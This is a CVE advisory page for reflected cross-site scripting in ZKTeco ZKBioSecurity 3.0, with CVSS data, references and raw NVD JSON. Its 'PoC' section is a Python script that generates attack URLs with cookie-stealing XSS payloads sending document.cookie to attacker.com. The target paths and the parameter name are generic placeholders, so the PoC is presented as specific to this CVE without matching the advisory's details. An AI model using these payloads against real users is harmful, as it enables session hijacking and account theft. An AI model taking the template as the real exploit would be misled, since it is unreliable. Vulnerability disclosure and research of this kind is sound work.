CVE-2016-20027

Description

ZKTeco ZKBioSecurity 3.0 contains multiple reflected cross-site scripting vulnerabilities that allow attackers to execute arbitrary HTML and script code by injecting malicious payloads through unsanitized parameters in multiple scripts. Attackers can craft malicious URLs with XSS payloads in vulnerable parameters to execute scripts in a user's browser session within the context of the affected application.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ZKTeco ZKBioSecurity 3.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import urllib.parse

def generate_xss_payload():
    # CVE-2016-20027 PoC - Reflected XSS in ZKTeco ZKBioSecurity 3.0
    
    # XSS payload examples
    payloads = [
        '<script>alert(document.cookie)</script>',
        '<img src=x onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)">',
        '<svg/onload=fetch("https://attacker.com/log?data="+btoa(document.cookie))>',
        'javascript:fetch("https://attacker.com/steal?c="+document.cookie)'
    ]
    
    # Target URLs with vulnerable parameters
    base_urls = [
        "https://target-server/zkbiosecurity/path/script.jsp",
        "https://target-server/zkbiosecurity/admin/somepage.do",
        "https://target-server/zkbiosecurity/search.action"
    ]
    
    # Generate malicious URLs
    malicious_urls = []
    for base_url in base_urls:
        for payload in payloads:
            encoded_payload = urllib.parse.quote(payload)
            malicious_url = f"{base_url}?param={encoded_payload}"
            malicious_urls.append(malicious_url)
    
    return malicious_urls

# Example usage
if __name__ == "__main__":
    urls = generate_xss_payload()
    print("Generated XSS URLs:")
    for url in urls:
        print(url)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2016-20027
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2016-20027
[3] CVE Details https://www.cvedetails.com/cve/CVE-2016-20027/
[4] VulDB https://vuldb.com/cve/CVE-2016-20027
[5] https://cxsecurity.com/issue/WLB-2016080267
[6] https://exchange.xforce.ibmcloud.com/vulnerabilities/116476
[7] https://packetstormsecurity.com/files/138568
[8] https://www.vulncheck.com/advisories/zkteco-zkbiosecurity-multiple-reflected-xss-vulnerabilities
[9] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5363.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2016-20027", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:49.117", "lastModified": "2026-04-15T14:56:45.970", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZKTeco ZKBioSecurity 3.0 contains multiple reflected cross-site scripting vulnerabilities that allow attackers to execute arbitrary HTML and script code by injecting malicious payloads through unsanitized parameters in multiple scripts. Attackers can craft malicious URLs with XSS payloads in vulnerable parameters to execute scripts in a user's browser session within the context of the affected application."}, {"lang": "es", "value": "ZKTeco ZKBioSecurity 3.0 contiene múltiples vulnerabilidades de cross-site scripting reflejado que permiten a los atacantes ejecutar código HTML y de script arbitrario inyectando cargas útiles maliciosas a través de parámetros no saneados en múltiples scripts. Los atacantes pueden crear URLs maliciosas con cargas útiles de XSS en parámetros vulnerables para ejecutar scripts en la sesión del navegador de un usuario dentro del contexto de la aplicación afectada."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2016080267", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/116476", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/138568", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/zkteco-zkbiosecurity-multiple-reflected-xss-vulnerabilities", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5363.php", "source": "[email protected]"}]}}